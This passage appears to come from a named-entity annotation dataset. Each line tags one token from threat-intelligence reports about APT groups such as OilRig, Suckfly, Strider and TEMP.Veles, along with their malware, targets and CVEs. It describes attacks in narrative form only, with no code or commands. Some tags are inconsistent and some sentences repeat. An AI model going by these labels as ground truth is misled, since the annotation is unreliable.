+within O +the O +" O +Incompatible O +" O +worksheet O +. 
O + +Clearly O +, O +OilRig S-APT +incorporates O +a O +testing O +component O +within O +their O +development O +process O +, O +as O +we O +have O +previously O +observed O +OilRig S-APT +performing O +testing B-ACT +activities E-ACT +on O +their O +delivery B-MAL +documents E-MAL +and O +their O +TwoFace B-MAL +webshells E-MAL +. O + +While O +continuing O +research O +on O +the O +August B-ACT +2018 I-ACT +attacks E-ACT +on O +a O +Middle B-LOC +eastern E-LOC +government S-IDTY +that O +delivered O +BONDUPDATER S-MAL +, O +Unit B-SECTEAM +42 E-SECTEAM +researchers O +observed O +OilRig S-APT +'s O +testing B-ACT +activities E-ACT +and O +with O +high O +confidence O +links O +this O +testing O +to O +the O +creation O +of O +the O +weaponized O +delivery O +document O +used O +in O +this O +attack O +. O + +While O +investigating O +recent O +attacks O +performed O +by O +the O +threat B-APT +actor I-APT +group I-APT +OilRig E-APT +using O +their O +new O +Bondupdater S-MAL +version O +, O +Unit B-SECTEAM +42 E-SECTEAM +researchers O +searched O +for O +additional O +Microsoft S-IDTY +Office O +documents O +used O +by O +OilRig S-APT +hoping O +to O +locate O +additional O +malware O +being O +used O +in O +other O +attacks O +during O +the O +same O +time O +period O +. O + +The O +tester O +created O +the O +final O +test O +file O +less O +than O +8 O +hours O +before O +the O +creation O +time O +of O +a O +delivery O +document O +, O +which O +was O +then O +delivered O +via O +a O +spear-phishing S-ACT +email E-ACT +20 O +minutes O +later O +. O + +During O +this O +testing O +, O +we O +saw O +document O +filenames O +that O +contain O +the O +C2 S-TOOL +we O +witnessed O +in O +the O +targeted B-ACT +attack E-ACT +above O +, O +specifically O +the O +filenames O +XLS-withyourface.xls S-FILE +and O +XLS-withyourface B-FILE +– I-FILE +test.xls E-FILE +. 
O + +These O +samples O +appeared O +to O +have O +been O +created O +by O +OilRig S-APT +during O +their O +development O +and O +testing B-ACT +activities E-ACT +, O +all O +of O +which O +share O +many O +similarities O +with O +the O +delivery O +document O +used O +in O +the O +recent O +OilRig B-APT +attack E-APT +against O +a O +Middle B-LOC +Eastern E-LOC +government S-IDTY +, O +N56.15.doc S-FILE +( O +7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 S-SHA2 +) O +that O +we O +have O +also O +included O +in O +Table O +1 O +. O + +However O +, O +they O +later O +continued O +by O +making O +modifications O +to O +the O +Excel B-ACT +document E-ACT +just O +prior O +to O +the O +attack O +on O +August B-TIME +26th E-TIME +. O + +HELIX B-APT +KITTEN E-APT +is O +likely O +an O +Iranian-based S-LOC +adversary O +group O +, O +active O +since O +at O +least O +late B-TIME +2015 E-TIME +, O +targeting O +organizations O +in O +the O +aerospace S-IDTY +, O +energy S-IDTY +, O +financial S-IDTY +, O +government S-IDTY +, O +hospitality S-IDTY +and O +telecommunications B-IDTY +business E-IDTY +verticals O +. O + +Additionally O +, O +HELIX B-APT +KITTEN I-APT +actors E-APT +have O +shown O +an O +affinity O +for O +creating O +thoroughly O +researched O +and O +structured O +spear-phishing S-ACT +messages O +relevant O +to O +the O +interests O +of O +targeted O +personnel S-IDTY +. O + +In O +addition O +to O +Helminth S-MAL +, O +the O +ISMDoor S-MAL +implant O +is O +likely O +used O +by O +the O +Iran-based S-LOC +adversary O +to O +attack O +targets O +particularly O +those O +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +These O +incidents O +involved O +spear-phishing S-ACT +attacks E-ACT +, O +which O +characteristic O +of O +HELIX B-APT +KITTEN E-APT +, O +included O +emails S-TOOL +containing O +malicious O +PowerShell S-MAL +in O +their O +macros O +that O +connects O +to O +known O +C2 S-TOOL +infrastructure O +. 
O + +During O +the O +summer B-TIME +of I-TIME +2018 E-TIME +, O +HELIX B-APT +KITTEN I-APT +actors E-APT +were O +observed O +targeting O +entities O +in O +the O +Middle B-LOC +East E-LOC +— O +of O +note O +, O +targets O +appeared O +to O +be O +located O +in O +Bahrain S-LOC +and O +Kuwait S-LOC +. O + +ISMDoor S-MAL +is O +able O +to O +exfiltrate O +data O +, O +take O +screenshots O +, O +and O +execute O +arbitrary O +commands O +on O +the O +victim O +'s O +machine O +. O + +In O +early B-TIME +November I-TIME +2018 E-TIME +, O +CrowdStrike S-SECTEAM +observed O +activity O +from O +the O +HELIX B-APT +KITTEN E-APT +adversary O +at O +a O +customer O +in O +the O +telecommunications S-IDTY +vertical O +. O + +The O +attackers S-APT +sent O +multiple O +emails S-TOOL +containing O +macro-enabled O +XLS B-FILE +files E-FILE +to O +employees B-IDTY +working I-IDTY +in I-IDTY +the I-IDTY +banking I-IDTY +sector E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +In O +the O +first O +week O +of O +May B-TIME +2016 E-TIME +, O +FireEye B-SECTEAM +'s I-SECTEAM +DTI E-SECTEAM +identified O +a O +wave O +of O +emails S-TOOL +containing O +malicious B-FILE +attachments E-FILE +being O +sent O +to O +multiple O +banks S-IDTY +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +Our O +data O +suggests O +that O +actors S-APT +have O +deployed O +the O +RGDoor B-MAL +backdoor E-MAL +on O +webservers O +belonging O +to O +eight O +Middle B-LOC +Eastern E-LOC +government B-IDTY +organizations E-IDTY +, O +as O +well O +as O +one O +financial S-IDTY +and O +one O +educational B-IDTY +institution E-IDTY +. O + +In O +August B-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +observed O +OilRig S-APT +targeting O +a O +government B-IDTY +organization E-IDTY +using O +spear-phishing S-ACT +emails S-TOOL +to O +deliver O +an O +updated O +version O +of O +a O +Trojan S-MAL +known O +as O +BONDUPDATER S-MAL +. 
O + +The O +OilRig B-APT +group E-APT +has O +been O +active O +since O +at O +least O +mid-2016 S-TIME +, O +and O +continues O +their O +attack B-ACT +campaigns E-ACT +throughout O +the O +Middle B-LOC +East E-LOC +, O +targeting O +both O +governmental B-IDTY +agencies E-IDTY +and O +businesses S-IDTY +on O +an O +almost O +routine O +basis O +. O + +BONDUPDATER S-MAL +is O +a O +PowerShell-based B-MAL +Trojan E-MAL +first O +discovered O +by O +FireEye S-SECTEAM +in O +mid-November B-TIME +2017 E-TIME +, O +when O +OilRig S-APT +targeted O +a O +different O +Middle B-LOC +Eastern E-LOC +governmental B-IDTY +organization E-IDTY +. O + +During O +the O +past O +month O +, O +Unit B-SECTEAM +42 E-SECTEAM +observed O +several O +attacks O +against O +a O +Middle B-LOC +Eastern E-LOC +government S-IDTY +leveraging O +an O +updated O +version O +of O +the O +BONDUPDATER S-MAL +malware S-MAL +, O +which O +now O +includes O +the O +ability O +to O +use O +TXT O +records O +within O +its O +DNS B-MAL +tunneling E-MAL +protocol O +for O +its O +C2 S-TOOL +communications O +. O + +The O +email S-ACT +had O +no O +subject O +and O +what O +initially O +drew O +our O +attention O +to O +OilRig S-APT +'s O +attack O +was O +the O +content O +of O +the O +spear B-ACT +phishing I-ACT +email E-ACT +. O + +As O +expected O +, O +OilRig S-APT +is O +continuing O +their O +onslaught O +of O +attacks O +well O +into O +2018 S-TIME +with O +continued O +targeting O +in O +the O +Middle B-LOC +East E-LOC +. O + +First O +identified O +in O +January B-TIME +2015 E-TIME +, O +Orangeworm O +has O +also O +conducted O +targeted B-ACT +attacks E-ACT +against O +organizations O +in O +related O +industries O +as O +part O +of O +a O +larger O +supply-chain B-ACT +attack E-ACT +in O +order O +to O +reach O +their O +intended O +victims O +. 
O + +According O +to O +Symantec S-SECTEAM +telemetry O +, O +almost O +40 O +percent O +of O +Orangeworm O +'s O +confirmed O +victim O +organizations O +operate O +within O +the O +healthcare B-IDTY +industry E-IDTY +. O + +Their O +next O +move O +was O +to O +list O +any O +remote O +shared O +drives O +and O +then O +attempt O +to O +access O +remote O +shares O +owned O +by O +the O +specific O +government B-IDTY +office E-IDTY +they O +were O +targeting O +, O +again O +attempting O +to O +extract O +all O +Word B-FILE +documents E-FILE +. O + +Sowbug S-APT +'s O +next O +move O +was O +to O +list O +any O +remote O +shared O +drives O +and O +then O +attempt O +to O +access O +remote O +shares O +owned O +by O +the O +specific O +government B-IDTY +office E-IDTY +they O +were O +targeting O +, O +again O +attempting O +to O +extract O +all O +Word B-FILE +documents E-FILE +. O + +For O +example O +, O +in O +September B-TIME +2016 E-TIME +, O +Sowbug S-APT +infiltrated O +an O +organization O +in O +Asia S-LOC +, O +deploying O +the O +Felismus B-MAL +backdoor E-MAL +on O +one O +of O +its O +computers O +, O +Computer O +A O +, O +using O +the O +file O +name O +adobecms.exe S-FILE +in O +CSIDL_WINDOWS\debug S-FILE +. O + +In O +this O +case O +, O +the O +attackers O +maintained O +a O +presence O +on O +the O +target O +'s O +network O +for O +nearly O +six O +months O +between O +September B-TIME +2016 E-TIME +and O +March B-TIME +2017 E-TIME +. O + +In O +other O +attacks O +, O +there O +was O +evidence O +that O +Felismus S-MAL +was O +installed O +using O +a O +tool O +known O +as O +Starloader S-MAL +( O +detected O +by O +Symantec S-SECTEAM +as O +Trojan.Starloader S-MAL +) O +. O + +Symantec S-SECTEAM +has O +found O +evidence O +of O +Starloader B-FILE +files E-FILE +being O +named O +AdobeUpdate.exe S-FILE +, O +AcrobatUpdate.exe S-FILE +, O +and O +INTELUPDATE.EXE S-FILE +among O +others O +. 
O + +Additionally O +, O +Starloader S-MAL +was O +also O +observed O +deploying O +additional O +tools O +used O +by O +the O +attackers O +, O +such O +as O +credential B-MAL +dumpers E-MAL +and O +keyloggers S-MAL +. O + +ASERT S-SECTEAM +has O +learned O +of O +an O +APT B-ACT +campaign E-ACT +, O +possibly O +originating O +from O +DPRK O +, O +we O +are O +calling O +STOLEN O +PENCIL O +that O +is O +targeting O +academic B-IDTY +institutions E-IDTY +since O +at O +least O +May B-TIME +2018 E-TIME +. O + +Once O +gaining O +a O +foothold O +on O +a O +user O +'s O +system O +, O +the O +threat O +actors O +behind O +STOLEN O +PENCIL O +use O +Microsoft S-IDTY +'s O +Remote B-TOOL +Desktop I-TOOL +Protocol E-TOOL +( O +RDP S-TOOL +) O +for O +remote O +point-and-click O +access O +. O + +The O +group O +uses O +an O +advanced O +piece O +of O +malware O +known O +as O +Remsec S-MAL +( O +Backdoor.Remsec S-MAL +) O +to O +conduct O +its O +attacks O +. O + +Strider S-APT +has O +been O +active O +since O +at O +least O +October B-TIME +2011 E-TIME +. O + +Lua B-MAL +modules E-MAL +is O +a O +technique O +that O +has O +previously O +been O +used O +by O +Flamer O +. O + +The O +Remsec S-MAL +malware S-MAL +used O +by O +Strider S-APT +has O +a O +modular O +design O +. O + +The O +group O +has O +maintained O +a O +low O +profile O +until O +now O +and O +its O +targets O +have O +been O +mainly O +organizations O +and O +individuals O +that O +would O +be O +of O +interest O +to O +a O +nation O +state O +'s O +intelligence B-IDTY +services E-IDTY +. O + +The O +group O +'s O +targets O +include O +a O +number O +of O +organizations O +and O +individuals O +located O +in O +Russia S-LOC +. O + +Remsec S-MAL +uses O +a O +Lua B-MAL +interpreter E-MAL +to O +run O +Lua B-MAL +modules E-MAL +which O +perform O +various O +functions O +. O + +Russia S-LOC +. 
O + +The O +attackers O +then O +began O +to O +perform O +reconnaissance O +activities S-ACT +on O +Computer O +A O +via O +cmd.exe S-FILE +, O +collecting O +system-related O +information O +, O +such O +as O +the O +OS O +version O +, O +hardware O +configuration O +, O +and O +network O +information O +. O + +the O +group O +'s O +targets O +include O +an O +organization O +in O +Sweden O +. O + +the O +group O +'s O +targets O +include O +an O +embassy S-IDTY +in O +Belgium O +. O + +Symantec S-SECTEAM +will O +continue O +to O +search O +for O +more O +Remsec B-MAL +modules E-MAL +and O +targets O +in O +order O +to O +build O +upon O +our O +understanding O +of O +Strider S-APT +and O +better O +protect O +our O +customers O +. O + +Another O +such O +an O +exceptional O +espionage O +platform O +is O +" O +ProjectSauron S-MAL +, O +also O +known O +as O +" O +Strider S-APT +" O +. O + +In O +September B-TIME +2015 E-TIME +, O +our O +anti-targeted O +attack O +technologies O +caught O +a O +previously O +unknown O +attack O +. O + +Forensic O +analysis O +indicates O +that O +the O +APT O +has O +been O +operational O +since O +at O +least O +June B-TIME +2011 E-TIME +and O +was O +still O +active O +in O +2016 S-TIME +. O + +After O +getting O +the O +IP S-PROT +, O +the O +ProjectSauron S-MAL +component O +tries O +to O +communicate O +with O +the O +remote O +server O +using O +its O +own O +( O +ProjectSauron S-MAL +) O +protocol O +as O +if O +it O +was O +yet O +another O +C&C S-TOOL +server O +. O + +In O +a O +number O +of O +the O +cases O +we O +analyzed O +, O +ProjectSauron S-MAL +deployed O +malicious B-MAL +modules E-MAL +inside O +the O +custom O +network O +encryption O +'s O +software O +directory O +, O +disguised O +under O +similar O +filenames O +and O +accessing O +the O +data O +placed O +beside O +its O +own O +executable O +. 
O + +The O +threat O +actor O +behind O +ProjectSauron S-MAL +commands O +a O +top-of-the-top O +modular O +cyber-espionage O +platform O +in O +terms O +of O +technical O +sophistication O +, O +designed O +to O +enable O +long-term O +campaigns O +through O +stealthy O +survival O +mechanisms O +coupled O +with O +multiple O +Exfiltration S-ACT +methods O +. O + +In O +September B-TIME +2015 E-TIME +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +Anti-Targeted O +Attack O +Platform O +discovered O +anomalous B-FILE +network I-FILE +traffic E-FILE +in O +a O +government B-IDTY +organization E-IDTY +network O +. O + +In O +late O +2015 S-TIME +, O +Symantec S-SECTEAM +identified O +suspicious O +activity O +involving O +a O +hacking O +tool O +used O +in O +a O +malicious O +manner O +against O +one O +of O +our O +customers S-IDTY +. O + +Secondary O +ProjectSauron B-MAL +modules E-MAL +are O +designed O +to O +perform O +specific O +functions O +like O +stealing B-ACT +documents E-ACT +, O +recording B-ACT +keystrokes E-ACT +, O +and O +hijacking B-ACT +encryption I-ACT +keys E-ACT +from O +both O +infected O +computers O +and O +attached O +USB O +sticks O +. O + +activity O +originated O +from O +three O +separate O +IP S-PROT +addresses O +, O +all O +located O +in O +Chengdu S-LOC +, O +China S-LOC +. O + +We O +don't O +know O +the O +exact O +date O +Suckfly O +stole O +the O +certificates O +from O +the O +South B-LOC +Korean E-LOC +organizations O +. O + +stolen O +certificates O +being O +used O +maliciously O +occurred O +in O +early O +2014 O +. O + +Symantec S-SECTEAM +detects O +this O +threat O +as O +Backdoor.Nidiran S-FILE +. 
O + +Specifically O +, O +Suckfly O +used O +a O +specially O +crafted O +web O +page O +to O +deliver O +an O +exploit S-VULNAME +for O +the O +Microsoft B-TOOL +Windows I-TOOL +OLE I-TOOL +Remote I-TOOL +Code I-TOOL +Execution I-TOOL +Vulnerability O +( O +CVE-2014-6332 S-VULID +) O +, O +which O +affects O +specific O +versions O +of O +Microsoft S-IDTY +Windows S-OS +. O + +The O +threat O +then O +executes O +" O +svchost.exe S-MAL +" O +. O + +Attackers O +have O +been O +known O +to O +distribute O +malicious B-FILE +files E-FILE +masquerading O +as O +the O +legitimate O +iviewers.dll B-MAL +file E-MAL +and O +then O +use O +DLL B-MAL +load I-MAL +hijacking E-MAL +to O +execute O +the O +malicious O +code O +and O +infect O +the O +computer O +. O + +Once O +exploit S-VULNAME +has O +been O +achieved O +, O +Nidiran S-MAL +is O +delivered O +through O +a O +self-extracting B-MAL +executable E-MAL +that O +extracts O +the O +components O +to O +a O +.tmp S-FILE +folder O +after O +it O +has O +been O +executed O +. O + +The O +certificates O +Blackfly O +stole O +were O +also O +from O +South B-LOC +Korean E-LOC +companies S-IDTY +, O +primarily O +in O +the O +video B-IDTY +game I-IDTY +and I-IDTY +software I-IDTY +development I-IDTY +industry E-IDTY +. O + +Blackfly S-APT +began O +with O +a O +campaign O +to O +steal O +certificates O +, O +which O +were O +later O +used O +to O +sign O +malware O +used O +in O +targeted B-ACT +attacks E-ACT +. O + +In O +March B-TIME +2016 E-TIME +, O +Symantec S-SECTEAM +published O +a O +blog O +on O +Suckfly O +, O +an O +advanced O +cyberespionage O +group O +that O +conducted O +attacks O +against O +a O +number O +of O +South B-LOC +Korean E-LOC +organizations O +to O +steal O +digital O +certificates O +. 
O + +Since O +then O +we O +have O +identified O +a O +number O +of O +attacks O +over O +a O +two-year O +period O +, O +beginning O +in O +April B-TIME +2014 E-TIME +, O +which O +we O +attribute O +to O +Suckfly O +. O + +The O +attacks O +targeted O +high-profile O +targets O +, O +including O +government S-IDTY +and O +commercial B-IDTY +organizations E-IDTY +. O + +these O +attacks O +were O +part O +of O +a O +planned O +operation O +against O +specific O +targets O +in O +India S-LOC +. O + +While O +there O +have O +been O +several O +Suckfly B-ACT +campaigns E-ACT +that O +infected O +organizations O +with O +the O +group O +'s O +custom O +malware O +Backdoor.Nidiran S-FILE +, O +the O +Indian O +targets O +show O +a O +greater O +amount O +of O +post-infection B-ACT +activity E-ACT +than O +targets O +in O +other O +regions O +. O + +While O +there O +have O +been O +several O +Suckfly B-ACT +campaigns E-ACT +that O +infected O +organizations O +with O +the O +group O +'s O +custom O +malware O +Backdoor.Nidiran S-FILE +, O +the O +Indian O +targets O +show O +a O +greater O +amount O +of O +post-infection B-ACT +activity E-ACT +than O +targets O +in O +other O +regions O +. O + +The O +first O +known O +Suckfly B-ACT +campaign E-ACT +began O +in O +April B-TIME +of I-TIME +2014 E-TIME +. O + +Suckfly S-ACT +'s O +attacks O +on O +government B-IDTY +organizations E-IDTY +that O +provide O +information B-IDTY +technology I-IDTY +services E-IDTY +to O +other O +government S-IDTY +branches O +is O +not O +limited O +to O +India S-LOC +. O + +It O +has O +conducted O +attacks O +on O +similar O +organizations O +in O +Saudi B-LOC +Arabia E-LOC +, O +likely O +because O +of O +the O +access O +that O +those O +organizations O +have O +. 
O + +Similar O +to O +its O +other O +attacks O +, O +Suckfly S-ACT +used O +the O +Nidiran B-MAL +back I-MAL +door E-MAL +along O +with O +a O +number O +of O +hacktools S-MAL +to O +infect O +the O +victim O +'s O +internal O +hosts O +. O + +In O +2015 S-TIME +, O +Suckfly S-ACT +conducted O +a O +multistage O +attack O +. O + +Suckfly S-ACT +conducted O +a O +multistage O +attack O +between O +April B-TIME +22 E-TIME +and O +May B-TIME +4 E-TIME +. O + +On O +April B-TIME +22 E-TIME +, O +2015 S-TIME +, O +Suckfly S-APT +exploited O +a O +vulnerability O +on O +the O +targeted O +employee O +'s O +operating O +system O +( O +Windows S-OS +) O +that O +allowed O +the O +attackers O +to O +bypass O +the O +User O +Account O +Control O +and O +install O +the O +Nidiran B-MAL +back I-MAL +door E-MAL +to O +provide O +access O +for O +their O +attack O +. O + +Suckfly S-ACT +conducted O +a O +multistage O +attack O +against O +an O +e-commerce B-IDTY +organization E-IDTY +. O + +Suckfly S-ACT +conducted O +a O +multistage O +attack O +against O +an O +e-commerce B-IDTY +organization E-IDTY +based O +in O +India S-LOC +. O + +Most O +of O +the O +group O +'s O +attacks O +are O +focused O +on O +government S-IDTY +or O +technology B-IDTY +related I-IDTY +companies E-IDTY +and O +organizations O +. O + +While O +we O +know O +the O +attackers O +used O +a O +custom B-MAL +dropper E-MAL +to O +install O +the O +back O +door O +, O +we O +do O +not O +know O +the O +delivery O +vector O +. O + +While O +tracking O +what O +days O +of O +the O +week O +Suckfly O +used O +its O +hacktools S-MAL +, O +we O +discovered O +that O +the O +group O +was O +only O +active O +Monday O +through O +Friday O +. O + +By O +targeting O +all O +of O +these O +organizations O +together O +, O +Suckfly O +could O +have O +had O +a O +much O +larger O +impact O +on O +India S-LOC +and O +its O +economy O +. 
O + +While O +we O +don't O +know O +the O +motivations O +behind O +the O +attacks O +, O +the O +targeted O +commercial B-IDTY +organizations E-IDTY +, O +along O +with O +the O +targeted O +government B-IDTY +organizations E-IDTY +, O +may O +point O +in O +this O +direction O +. O + +There O +is O +no O +evidence O +that O +Suckfly O +gained O +any O +benefits O +from O +attacking O +the O +government B-IDTY +organizations E-IDTY +, O +but O +someone O +else O +may O +have O +benefited O +from O +these O +attacks O +. O + +During O +this O +time O +they O +were O +able O +to O +steal O +digital O +certificates O +from O +South B-LOC +Korean E-LOC +companies S-IDTY +and O +launch O +attacks O +against O +Indian O +and O +Saudi O +Arabian O +government B-IDTY +organizations E-IDTY +. O + +We O +believe O +that O +Suckfly S-ACT +will O +continue O +to O +target O +organizations O +in O +India S-LOC +and O +similar O +organizations O +in O +other O +countries O +in O +order O +to O +provide O +economic S-IDTY +insight O +to O +the O +organization O +behind O +Suckfly S-ACT +'s O +operations O +. O + +This O +time O +, O +however O +, O +TA459 O +opportunistically O +used O +spear-phishing S-ACT +emails S-TOOL +with O +a O +Microsoft B-FILE +Word I-FILE +attachment E-FILE +exploiting O +the O +recently O +patched O +CVE-2017-0199 S-VULID +to O +deploy O +the O +ZeroT B-MAL +Trojan E-MAL +, O +which O +in O +turn O +downloaded O +the O +PlugX B-MAL +Remote I-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +Proofpoint S-SECTEAM +is O +tracking O +this O +attacker O +, O +believed O +to O +operate O +out O +of O +China S-LOC +, O +as O +TA459 S-APT +. 
O + +This O +time O +, O +however O +, O +attackers O +opportunistically O +used O +spear-phishing S-ACT +emails S-TOOL +with O +a O +Microsoft B-FILE +Word I-FILE +attachment E-FILE +exploiting O +the O +recently O +patched O +CVE-2017-0199 S-VULID +to O +deploy O +the O +ZeroT B-MAL +Trojan E-MAL +, O +which O +in O +turn O +downloaded O +the O +PlugX B-MAL +Remote I-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +TA549 S-APT +possesses O +a O +diverse O +malware O +arsenal O +including O +PlugX S-MAL +, O +NetTraveler S-MAL +, O +and O +ZeroT S-MAL +. O + +TA459 S-APT +is O +well-known O +for O +targeting O +organizations O +in O +Russia O +and O +neighboring O +countries O +. O + +Ongoing O +activity O +from O +attack O +groups O +like O +TA459 S-APT +who O +consistently O +target O +individuals O +specializing O +in O +particular O +LOCs O +of O +research O +and O +expertise O +further O +complicate O +an O +already O +difficult O +security O +situation O +for O +organizations O +dealing O +with O +more O +traditional O +malware O +threats O +, O +phishing B-ACT +campaigns E-ACT +, O +and O +socially O +engineered O +threats O +every O +day O +. O + +Using O +data O +collected O +from O +the O +Trend B-SECTEAM +Micro™ I-SECTEAM +Smart I-SECTEAM +Protection I-SECTEAM +Network E-SECTEAM +, O +we O +are O +able O +to O +identify O +victims O +whose O +networks O +communicated O +with O +Taidoor B-MAL +C&C I-MAL +servers E-MAL +. O + +The O +Taidoor O +attackers O +have O +been O +actively O +engaging O +in O +targeted B-ACT +attacks E-ACT +since O +at O +least O +March B-TIME +4 E-TIME +, O +2009 S-TIME +. O + +Taidoor O +spoofed O +Taiwanese S-LOC +government S-IDTY +email S-TOOL +addresses O +to O +send O +out O +socially B-ACT +engineered E-ACT +emails S-TOOL +in O +the O +Chinese S-LOC +language O +that O +typically O +leveraged O +Taiwan-themed O +issues O +. 
O + +Despite O +some O +exceptions O +, O +the O +Taidoor B-ACT +campaign E-ACT +often O +used O +Taiwanese S-LOC +IP S-MAL +addresses O +as O +C&C S-TOOL +servers O +and O +email S-TOOL +addresses O +to O +send O +out O +socially B-ACT +engineered E-ACT +emails S-TOOL +with O +malware O +as O +attachments O +. O + +One O +of O +the O +primary O +targets O +of O +the O +Taidoor B-ACT +campaign E-ACT +appeared O +to O +be O +the O +Taiwanese S-LOC +government S-IDTY +. O + +Suckfly O +targeted O +one O +of O +India S-LOC +'s O +largest O +e-commerce B-IDTY +companies E-IDTY +, O +a O +major O +Indian O +shipping B-IDTY +company E-IDTY +, O +one O +of O +India S-LOC +'s O +largest O +financial B-IDTY +organizations E-IDTY +, O +and O +an O +IT B-IDTY +firm E-IDTY +that O +provides O +support O +for O +India S-LOC +'s O +largest O +stock O +exchange O +. O + +Data O +from O +the O +early O +part O +of O +this O +year O +shows O +that O +the O +Taidoor O +attackers O +rampantly O +used O +malicious.DOC S-FILE +files O +to O +exploit S-VULNAME +a O +Microsoft S-IDTY +Common B-TOOL +Controls E-TOOL +vulnerability S-VULNAME +, O +CVE-2012-0158 S-VULID +. O + +Taidoor O +actively O +sent O +out O +malicious B-ACT +documents E-ACT +and O +maintained O +several O +IP B-ACT +addresses E-ACT +for O +command O +and O +control O +. O + +The O +attackers O +actively O +sent O +out O +malicious O +documents O +and O +maintained O +several O +IP B-ACT +addresses E-ACT +for O +command O +and O +control O +. O + +As O +part O +of O +their O +social B-IDTY +engineering E-IDTY +ploy O +, O +the O +Taidoor O +attackers O +attach O +a O +decoy O +document O +to O +their O +emails S-TOOL +that O +, O +when O +opened O +, O +displays O +the O +contents O +of O +a O +legitimate O +document O +but O +executes O +a O +malicious O +payload O +in O +the O +background O +. 
O + +Sometimes O +, O +however O +, O +certain O +samples O +made O +use O +of O +domain B-ACT +names E-ACT +for O +HTTP S-PROT +communication O +. O + +Based O +on O +the O +command O +capabilities O +of O +the O +Taidoor S-MAL +malware S-MAL +, O +we O +were O +able O +to O +determine O +that O +data O +theft O +and O +data O +destruction O +was O +possible O +. O + +The O +ultimate O +objective O +of O +targeted B-ACT +attacks E-ACT +is O +to O +acquire O +sensitive O +data O +. O + +In O +December B-TIME +2017 E-TIME +, O +FireEye S-SECTEAM +publicly O +released O +our O +first O +analysis O +on O +the O +TRITON B-ACT +attack E-ACT +where O +malicious O +actors O +used O +the O +TRITON S-MAL +custom O +attack B-ACT +framework E-ACT +to O +manipulate O +industrial O +safety O +systems O +at O +a O +critical O +infrastructure O +facility O +and O +inadvertently O +caused O +a O +process O +shutdown O +. O + +In O +our O +most O +recent O +analysis O +, O +we O +attributed O +the O +intrusion B-ACT +activity E-ACT +that O +led O +to O +the O +deployment O +of O +TRITON S-MAL +to O +a O +Russian S-LOC +government-owned O +technical O +research O +institute O +in O +Moscow S-LOC +. O + +For O +more O +in-depth O +analysis O +of O +TRITON S-MAL +and O +other O +cyber O +threats O +, O +consider O +subscribing O +to O +FireEye B-SECTEAM +Cyber I-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +. O + +During O +this O +time O +, O +the O +attacker O +must O +ensure O +continued O +access O +to O +the O +target O +environment O +or O +risk O +losing O +years O +of O +effort O +and O +potentially O +expensive O +custom O +ICS S-MAL +malware S-MAL +. 
O + +In O +this O +report O +we O +continue O +our O +research O +of O +the O +actor O +'s O +operations O +with O +a O +specific O +focus O +on O +a O +selection O +of O +custom O +information B-IDTY +technology E-IDTY +( O +IT S-IDTY +) O +tools O +and O +tactics O +the O +threat O +actor O +leveraged O +during O +the O +early O +stages O +of O +the O +targeted B-ACT +attack E-ACT +lifecycle O +. O + +Additionally O +, O +the O +actor O +possibly O +gained O +a O +foothold O +on O +other O +target O +networks—beyond O +the O +two O +intrusions O +discussed O +in O +this O +post O +– O +using O +similar O +strategies O +. O + +There O +is O +often O +a O +singular O +focus O +from O +the O +security B-SECTEAM +community E-SECTEAM +on O +ICS S-MAL +malware S-MAL +largely O +due O +to O +its O +novel O +nature O +and O +the O +fact O +that O +there O +are O +very O +few O +examples O +found O +in O +the O +wild O +. O + +In O +this O +blog O +post O +we O +provide O +additional O +information O +linking O +TEMP.Veles S-APT +and O +their O +activity O +surrounding O +the O +TRITON S-MAL +intrusion O +to O +a O +Russian O +government-owned O +research O +institute O +. O + +Analysis O +of O +these O +cryptcat O +binaries O +indicates O +that O +the O +actor O +continually O +modified O +them O +to O +decrease O +AV O +detection O +rates O +. O + +TEMP.Veles' S-APT +lateral O +movement B-ACT +activities E-ACT +used O +a O +publicly-available O +PowerShell-based B-MAL +tool E-MAL +, O +WMImplant S-MAL +. O + +On O +multiple O +dates O +in O +2017 S-TIME +, O +TEMP.Veles S-APT +struggled O +to O +execute O +this O +utility O +on O +multiple O +victim O +systems O +, O +potentially O +due O +to O +AV O +detection O +. 
O + +Custom O +payloads O +utilized O +by O +TEMP.Veles S-APT +in O +investigations O +conducted O +by O +Mandiant S-SECTEAM +are O +typically O +weaponized O +versions O +of O +legitimate O +open-source O +software O +, O +retrofitted B-ACT +with I-ACT +code E-ACT +used O +for O +command O +and O +control O +. O + +We O +identified O +file O +creation O +times O +for O +numerous O +files O +that O +TEMP.Veles S-APT +created O +during O +lateral O +movement O +on O +a O +target O +'s O +network O +. O + +Adversary O +behavioral O +artifacts O +further O +suggest O +the O +TEMP.Veles S-APT +operators O +are O +based O +in O +Moscow S-LOC +, O +lending O +some O +further O +support O +to O +the O +scenario O +that O +CNIIHM S-APT +, O +a O +Russian S-LOC +research B-IDTY +organization E-IDTY +in O +Moscow S-LOC +, O +has O +been O +involved O +in O +TEMP.Veles B-APT +activity E-ACT +. O + +XENOTIME S-APT +is O +easily O +the O +most O +dangerous O +threat B-ACT +activity E-ACT +publicly O +known O +. O + +CNIIHM S-APT +'s O +characteristics O +are O +consistent O +with O +what O +we O +might O +expect O +of O +an O +organization O +responsible O +for O +TEMP.Veles B-APT +activity E-ACT +. O + +Dragos S-SECTEAM +identified O +several O +compromises O +of O +ICS B-MAL +vendors I-MAL +and I-MAL +manufacturers E-MAL +in O +2018 S-TIME +by O +activity O +associated O +with O +XENOTIME S-APT +, O +providing O +potential O +supply O +chain O +threat O +opportunities O +and O +vendor-enabled O +access O +to O +asset O +owner O +and O +operator O +ICS B-MAL +networks E-MAL +. O + +XENOTIME S-APT +rose O +to O +prominence O +in O +December B-TIME +2017 E-TIME +when O +Dragos S-SECTEAM +and O +FireEye S-SECTEAM +jointly O +published O +details O +of O +TRISIS S-MAL +destructive O +malware O +targeting O +Schneider O +Electric O +'s O +Triconex O +safety O +instrumented O +system O +. 
